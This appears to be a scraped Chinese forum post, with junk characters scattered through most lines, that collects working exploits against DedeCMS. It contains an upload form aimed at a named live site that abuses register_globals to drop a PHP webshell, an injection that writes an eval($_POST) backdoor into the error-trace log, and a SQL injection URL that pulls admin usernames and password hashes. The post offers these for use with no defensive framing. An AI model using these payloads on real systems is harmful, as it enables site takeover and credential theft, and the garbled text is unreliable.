: Y" x% ] q ^4 @5 V<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
; Z) A- l2 B8 S5 d5 `<input type='hidden' name='activepath' value='/data/cache/' />
! r0 K' B' a* c$ N$ P<input type='hidden' name='cfg_basedir' value='../../' />
5 z- ^% U2 [/ P& w! E% Z( O<input type='hidden' name='cfg_imgtype' value='php' />; @8 p: u. T7 I8 h
<input type='hidden' name='cfg_not_allowall' value='txt' />- z" H- v# c( _, O5 Z
<input type='hidden' name='cfg_softtype' value='php' />
1 x& |% F+ K: a4 N5 Z# Q<input type='hidden' name='cfg_mediatype' value='php' />
6 B! v# r( h4 A& m' [3 L* J<input type='hidden' name='f' value='form1.enclosure' />
8 m3 V$ k7 E* N" w<input type='hidden' name='job' value='upload' />/ r8 F' V" ~, Z/ w) ]) c
<input type='hidden' name='newname' value='fly.php' />9 V3 ~6 e. ^5 a1 w0 f$ y
Select U Shell <input type='file' name='uploadfile' size='25' />
" n b* ~/ a N- o" x<input type='submit' name='sb1' value='确定' />: Q- K! y& e) r; J* q7 M
</form>9 W0 v! B5 x: |7 o2 z) o
<br />It's just a exp for the bug of Dedecms V55...<br />0 @2 m# @# Z* Z: X( U, U8 x
Need register_globals = on...<br />9 L% B i# {6 m' X0 {3 [4 P
Fun the game,get a webshell at /data/cache/fly.php...<br />' [. B( n; E \5 `+ F9 c* S' T
</body>5 B" |) L4 @) K, c; u2 r" P
</html>- _! `, R# J& z1 o' y, o+ ^5 M
" N: F0 M" x8 p6 q g; h, L v
; E' f4 j8 Y. c# u E/ {1 R# w" l3 c# `- e: ?4 l8 r
! z+ Y+ q) W1 M# z
8 Y5 h, D6 h8 r/ A# P
4 [" X" e9 H1 ^# \2 r. f
/ w8 _7 X. @8 k
: {! F" ~; a+ U u, D; ~5 d+ G* d: N y; {' H; _
/ P) z& V2 }8 i
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
8 x- Z3 f5 k1 c6 ], a利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。) j1 g8 l! z9 H# t( ?
1. 访问网址:
9 e. H' H6 \! p) a# vhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
. A( _) d# l) `6 e可看见错误信息 A# I9 j R8 y- E
; z1 c, M$ v' E4 V) Q* M. q7 x/ q: W) h% _3 z% N. E m
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
( A. e e4 G) d3 v2 B7 lint(3) Error: Illegal double '1024e1024' value found during parsing2 e) G/ M/ n% E' s( s6 `) Y) j# ]
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>; ~5 u# e4 n, z6 c% J+ ]+ B
$ i C+ b9 }) _
1 h h$ {$ k; E1 V; W! a, D
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是1 v8 p* P/ i1 W: D4 l. s: T
3 G" s5 w, p* F' K
# O- ?2 h. j9 q& A2 q4 [: l e: {
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>$ H3 C2 _5 Q6 y V; P
. Z% X- O. p v# P" m9 \
; B# z8 s# v6 ~% ^/ U7 k. P
按确定后的看到第2步骤的信息表示文件木马上传成功.' P# Q4 m. w5 X h
7 O! S) f1 H% `, L# f3 f8 N
, h4 N: O: D/ v5 y
3 q9 X8 U1 }/ w( S/ w: I# R- X3 {* V- u4 |5 ?
' s8 m3 ` N3 d" C9 ?+ q* w' ` E
) t* d! Q4 \( x
; [: o r4 k. t$ p" g1 V7 U
' T" P- N# s9 Q+ h* f2 n7 j
# @% x0 T" k w! |
* L& |" N8 n& W2 \- H3 s
5 u- x( u" g4 w" [织梦(DedeCms)plus/infosearch.php 文件注入漏洞. P3 G" d' U+ R/ d; v0 V
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对